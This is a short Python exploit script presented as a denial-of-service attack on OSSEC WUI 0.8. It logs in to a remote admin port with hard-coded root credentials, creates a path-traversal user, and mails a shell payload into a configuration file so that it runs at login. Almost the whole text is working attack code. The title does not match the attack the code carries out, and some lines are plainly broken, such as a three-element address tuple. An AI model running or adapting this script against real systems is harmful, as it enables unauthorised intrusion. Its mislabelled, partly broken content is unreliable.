########################################################### # Exploit Title: [OSSEC] # Date: [2015-08-01] # Exploit Author: [Milad Saber] # Vendor Homepage: [www.ossec.net] # Software Link: [www.ossec.net/files/ossec-wui-0.8.tar.gz] # Version: [0.8] # Tested on: [OSSEC Manager] # Exploit for DOS ossec server. # Please install ossec server and WUI 0.8 and run this exploit ########################################################## import socket import sys import time # specify payload payload = '[ "$(id -u)" == "0" ] && touch /var/ossec/ossec.conf' # to exploit only on root user = 'root' pwd = 'var' if len(sys.argv) != 2: sys.stderr.write("[-]Usage: python %s \ossec-wui-0.8" % sys.argv[0]) sys.stderr.write("[-]Exemple: python %s 127.0.0.1\ossec-wui-0.8" % sys.argv[0]) sys.exit(1) ip = sys.argv[1] def recv(s): s.recv(1024) time.sleep(0.2) try: print "[+]Connecting to milad exploit ..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,4555)) s.recv(1024) s.send(user + "\n") s.recv(1024) s.send(pwd + "\n") s.recv(1024) print "[+]Creating user..." s.send("adduser ../../../../../../../../var/ossec/ossec.conf exploit\n") s.recv(1024) s.send("quit\n") s.close() print "[+]Connecting to SMTP server..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,25,80)) s.send("hello milad@milad.pl\r\n") recv(s) print "[+]Sending payload..." s.send("mail from: <'@milad.pl>\r\n") recv(s) # also try s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf/r\n") if the recipient cannot be found s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf\r\n") recv(s) s.send("data\r\n") recv(s) s.send("From: milad@milad.pl\r\n") s.send("\r\n") s.send("'\n") s.send(payload + "\n") s.send("\r\n.\r\n") recv(s) s.send("quit\r\n") recv(s) s.close() print "[+]Done! Payload will be executed once somebody logs in." except: print "Connection failed."